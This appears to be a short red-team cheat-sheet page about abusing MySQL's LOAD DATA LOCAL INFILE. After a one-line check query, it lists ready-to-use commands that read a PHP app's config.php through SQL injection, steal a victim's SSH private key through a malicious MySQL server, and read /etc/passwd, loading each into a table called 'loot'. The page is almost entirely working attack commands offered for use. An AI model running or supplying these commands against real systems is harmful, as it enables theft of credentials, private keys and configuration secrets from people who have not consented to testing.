Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / MYSQL / FILE ACCESS

Local-Infile

Check

SHOW VARIABLES LIKE 'local_infile';

Commands


-- WEB ROOT (SQLi on PHP app)
LOAD DATA LOCAL INFILE '/var/www/html/config.php' INTO TABLE loot;

-- SSH KEY THEFT (victim connects to malicious MySQL server)
LOAD DATA LOCAL INFILE '/home/victim/.ssh/id_rsa' INTO TABLE loot;

-- General FILE READ (client-side)
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE loot FIELDS TERMINATED BY '\n';